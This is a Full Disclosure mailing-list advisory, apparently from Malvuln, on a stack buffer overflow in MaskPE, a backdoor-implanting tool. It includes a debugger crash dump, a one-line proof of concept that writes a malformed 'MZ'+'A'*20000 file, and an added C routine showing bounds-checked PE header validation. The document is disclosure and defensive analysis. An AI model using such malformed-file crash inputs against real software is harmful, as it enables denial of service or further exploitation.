Message-ID: <CAAHK0WScpjFKGkzu23U9TZ7J4npmx-pg31T_VSMc-rH4c6YDZw@mail.gmail.com>
Date: Sat, 11 Dec 2021 16:19:42 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Nucleroot.mf / Stack Buffer Overflow
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Nucleroot.mf
Vulnerability: Stack Buffer Overflow
Description: MaskPE by yzkzero is a tool for implanting backdoors in existing
PE files. The backdoor tool doesn't properly check the files it loads and
falls victim to a file-based local buffer overflow.
Type: PE32
MD5: 8de56eef118187a89eeab972288ce94d
Vuln ID: MVID-2021-0420
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 12/11/2021
Memory Dump:
(1790.60): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003 edi=00000003
eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7770ed3c c21400 ret 14h
0:000> .ecxr
eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8
eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
*** WARNING: Unable to verify checksum for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
Backdoor_Win32_Nucleroot_mf+0x90e3:
004090e3 813850450000 cmp dword ptr [eax],4550h
ds:002b:454e4141=????????
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************
FAULTING_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550h
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 454e4141
Attempt to read from address 454e4141
PROCESS_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 454e4141
READ_ADDRESS: 454e4141
FOLLOWUP_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550h
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000060
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 004049b2 to 004090e3
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f0c8 004049b2 00000001 0019fb74 0019f438 Backdoor_Win32_Nucleroot_mf+0x90e3
0019fc1c 77408654 000000b8 00000000 026a1600 Backdoor_Win32_Nucleroot_mf+0x49b2
0042fba0 00403690 004012a0 00420e01 0042167d kernel32!BaseThreadInitThunk+0x24
0042fba8 00420e01 0042167d 004255fe 0042565f Backdoor_Win32_Nucleroot_mf+0x3690
0042fbac 0042167d 004255fe 0042565f 00425604 Backdoor_Win32_Nucleroot_mf+0x20e01
0042fbb0 004255fe 0042565f 00425604 00425604 Backdoor_Win32_Nucleroot_mf+0x2167d
0042fbb4 0042565f 00425604 00425604 00425607 Backdoor_Win32_Nucleroot_mf+0x255fe
0042fbb8 00425604 00425604 00425607 004021b0 Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbbc 00425604 00425607 004021b0 00425664 Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc0 00425607 004021b0 00425664 00425615 Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc4 004021b0 00425664 00425615 00425659 Backdoor_Win32_Nucleroot_mf+0x25607
0042fbc8 00425664 00425615 00425659 00421982 Backdoor_Win32_Nucleroot_mf+0x21b0
0042fbcc 00425615 00425659 00421982 0042561b Backdoor_Win32_Nucleroot_mf+0x25664
0042fbd0 00425659 00421982 0042561b 00425655 Backdoor_Win32_Nucleroot_mf+0x25615
0042fbd4 00421982 0042561b 00425655 0042565f Backdoor_Win32_Nucleroot_mf+0x25659
0042fbd8 0042561b 00425655 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x21982
0042fbdc 00425655 0042565f 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x2561b
0042fbe0 0042565f 0042565f 0042565f 00420d33 Backdoor_Win32_Nucleroot_mf+0x25655
0042fbe4 0042565f 0042565f 00420d33 00422195 Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbe8 0042565f 00420d33 00422195 0042214c Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbec 00420d33 00422195 0042214c 00423e5e Backdoor_Win32_Nucleroot_mf+0x2565f
0042fcec 00420d4d 00420d33 00690053 0065007a Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf0 00420d33 00690053 0065007a 0066004f Backdoor_Win32_Nucleroot_mf+0x20d4d
0042fcf4 00690053 0065007a 0066004f 006d0049 Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053
0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a
0042fd00 006d0049 00670061 00000065 00610042 0x66004f
0042fd04 00670061 00000065 00610042 00650073 0x6d0049
0042fd08 00000000 00610042 00650073 0066004f 0x670061
STACK_COMMAND: ~0s; .ecxr ; kb
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Backdoor_Win32_Nucleroot_mf+90e3
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Nucleroot_mf
IMAGE_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74
FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3
Exploit/PoC:
python -c "print( 'MZ'+'A'*20000)" > DOOM.exe
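The faulting instruction above compares dword ptr [eax] against 4550h ("PE\0\0") with eax = 454e4141, which is consistent with a PE-signature check at base + e_lfanew where e_lfanew was taken unchecked from the 'A'-filled file. As an added example (not code from the advisory or from MaskPE), this C routine shows the bounds-checked form of that header validation, run against a constructed input shaped like the PoC file; the lower bound on e_lfanew is an assumption based on the conventional 0x40-byte DOS header.

```c
#include <stdint.h>
#include <string.h>

#define DOS_MAGIC       0x5A4Du      /* "MZ" */
#define PE_SIGNATURE    0x00004550u  /* "PE\0\0": the 4550h the crashing cmp tests */
#define E_LFANEW_OFFSET 0x3Cu        /* IMAGE_DOS_HEADER.e_lfanew */

enum pe_check { PE_OK, PE_TOO_SHORT, PE_BAD_DOS_MAGIC, PE_BAD_LFANEW, PE_BAD_SIGNATURE };

/* Validate DOS/PE headers of a file image without reading past 'len' bytes.
 * The unchecked pattern behind the advisory's crash is effectively
 * cmp [base + e_lfanew], 'PE' with e_lfanew taken straight from the file. */
enum pe_check validate_pe_headers(const uint8_t *buf, size_t len)
{
    uint16_t dos_magic;
    uint32_t e_lfanew, sig;

    if (len < E_LFANEW_OFFSET + sizeof e_lfanew)
        return PE_TOO_SHORT;
    memcpy(&dos_magic, buf, sizeof dos_magic);          /* little-endian host assumed */
    if (dos_magic != DOS_MAGIC)
        return PE_BAD_DOS_MAGIC;
    memcpy(&e_lfanew, buf + E_LFANEW_OFFSET, sizeof e_lfanew);
    /* e_lfanew must leave room for the 4-byte signature inside the buffer;
     * an 'AAAA' value (0x41414141) is rejected here instead of becoming a wild read. */
    if (e_lfanew < E_LFANEW_OFFSET + sizeof e_lfanew || e_lfanew > len - sizeof sig)
        return PE_BAD_LFANEW;
    memcpy(&sig, buf + e_lfanew, sizeof sig);
    return sig == PE_SIGNATURE ? PE_OK : PE_BAD_SIGNATURE;
}

/* Constructed input shaped like the advisory's PoC: "MZ" followed by 20000 'A' bytes. */
static uint8_t poc[2 + 20000];

enum pe_check check_poc_file(void)
{
    memset(poc, 'A', sizeof poc);
    poc[0] = 'M'; poc[1] = 'Z';
    return validate_pe_headers(poc, sizeof poc);
}

/* Constructed minimal well-formed header: "MZ", e_lfanew = 0x40, "PE\0\0" at 0x40. */
enum pe_check check_minimal_valid(void)
{
    uint8_t img[0x44] = {0};
    img[0] = 'M'; img[1] = 'Z';
    img[E_LFANEW_OFFSET] = 0x40;
    img[0x40] = 'P'; img[0x41] = 'E';
    return validate_pe_headers(img, sizeof img);
}
```

The PoC-shaped input is rejected at the e_lfanew bound before any dereference, which is exactly the check the crash dump shows is missing.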
Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/